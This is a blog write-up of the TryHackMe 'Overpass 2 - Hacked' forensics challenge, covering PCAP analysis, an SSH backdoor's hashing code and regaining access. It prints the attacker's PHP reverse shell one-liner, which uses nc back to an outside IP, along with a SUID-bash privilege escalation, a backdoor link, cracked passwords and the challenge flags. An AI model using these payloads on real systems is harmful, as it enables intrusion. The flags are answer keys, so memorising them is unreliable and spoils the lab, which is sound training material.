tryhackme--Overpass 2 - Hacked
- Task 1 - Forensics - Analyse the PCAP
- #1 What was the URL of the page they used to upload a reverse shell?
- #2 What payload did the attacker use to gain access?
- #3 What password did the attacker use to privesc?
- #4 How did the attacker establish persistence?
- #5 Using the fasttrack wordlist, how many of the system passwords were crackable?
- Task 2 Research - Analyse the code
- #1 What's the default hash for the backdoor?
- #2 What's the hardcoded salt for the backdoor?
- #3 What was the hash that the attacker used? - go back to the PCAP for this!
- #4 Crack the hash using rockyou and a cracking tool of your choice. What's the password?
- Task 3 Attack - Get back in!
- #1 The attacker defaced the website. What message did they leave as a heading?
- #2 What's the user flag?
- #3 What's the root flag?
- PS:
A routine blog post~~~~
Today I'm sharing a forensics challenge from TryHackMe.
Task 1 - Forensics - Analyse the PCAP
#1 What was the URL of the page they used to upload a reverse shell?
Looking at the HTTP packets, the requests and responses tell us the attacker's IP is 192.168.170.145 and the server's IP is 192.168.170.159, and there is an upload.php under the /development/ directory, so the answer is:
/development/
#2 What payload did the attacker use to gain access?
Searching for key strings turns up payload.php; following the TCP stream shows the actual data that was sent.
The attacker used upload.php to upload a new file, payload.php, which from its content is a reverse shell:
<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>
#3 What password did the attacker use to privesc?
Continuing with the TCP stream to see which commands the payload executed,
the user switched from www to james with the password:
whenevernoteartinstant
#4 How did the attacker establish persistence?
Reading further through the attacker's commands, we find that james can run any command as any user, which is a configuration error. Further down, the attacker first looked at /etc/passwd, then downloaded an SSH backdoor from GitHub and installed and ran it:
https://github.com/NinjaJc01/ssh-backdoor
#5 Using the fasttrack wordlist, how many of the system passwords were crackable?
The server has 5 users in total. The attacker already knows james's password, so only the remaining four users' passwords need to be cracked; running john on Kali works for this.
4
Task 2 Research - Analyse the code
#1 What’s the default hash for the backdoor?
Look at main.go:
bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3
#2 What’s the hardcoded salt for the backdoor?
Find the salt used by the hash algorithm:
1c362db832f3f864c8c2fe05f2002a05
#3 What was the hash that the attacker used? - go back to the PCAP for this!
6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
#4 Crack the hash using rockyou and a cracking tool of your choice. What’s the password?
From the algorithm we can see that the password is salted and then hashed, i.e.
SHA512(password + '1c362db832f3f864c8c2fe05f2002a05') = '6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed'
Next we crack the password with hashcat:
november16
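As an added example (not code from the original writeup or from the backdoor project), the following Python reproduces the scheme above, SHA-512 over password followed by the fixed salt, and checks a candidate list against the hash recovered from the PCAP. The candidate list is constructed here; the salt and hash are the values from the writeup. The point for a defender: one fast SHA-512 round with a hard-coded salt means every guess costs a single hash, which is why a wordlist attack finishes quickly.

```python
import hashlib
import hmac

# Values from the writeup: salt from main.go, hash recovered from the PCAP
BACKDOOR_SALT = "1c362db832f3f864c8c2fe05f2002a05"
CAPTURED_HASH = (
    "6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3"
    "e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed"
)

# Constructed mini-wordlist standing in for rockyou
CANDIDATES = ["password", "letmein", "october15", "november16", "december17"]


def backdoor_hash(password: str, salt: str = BACKDOOR_SALT) -> str:
    """SHA-512 of password + salt, as the writeup describes (hashcat mode 1710)."""
    return hashlib.sha512((password + salt).encode()).hexdigest()


def verify(password: str, expected_hash: str, salt: str = BACKDOOR_SALT) -> bool:
    """Constant-time comparison of a candidate against a stored hex digest."""
    return hmac.compare_digest(backdoor_hash(password, salt), expected_hash)


def find_match(candidates, expected_hash: str, salt: str = BACKDOOR_SALT):
    """Return the first candidate whose hash equals expected_hash, or None.

    Each candidate costs exactly one SHA-512 call: no per-user salt and no
    work factor, which is what makes the captured hash cheap to test against
    a wordlist.
    """
    for pw in candidates:
        if verify(pw, expected_hash, salt):
            return pw
    return None


if __name__ == "__main__":
    print("match:", find_match(CANDIDATES, CAPTURED_HASH))
```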
Task 3 Attack - Get back in!
#1 The attacker defaced the website. What message did they leave as a heading?
Visit the HTTP service:
H4ck3d by CooctusClan
#2 What's the user flag?
Log in to the server through the SSH backdoor and find user.txt in james's home directory:
thm{d119b4fa8c497ddb0525f7ad200e6567}
#3 What’s the root flag?
We find a suspicious SUID file, /home/james/.suid_bash.
This is the bash privilege-escalation method, except that here it is a binary file, so it can simply be executed directly.
Run it to get the flag:
thm{d53b2684f169360bb9606c333873144d}
PS:
Personal blog site: XingHe, feel free to drop by~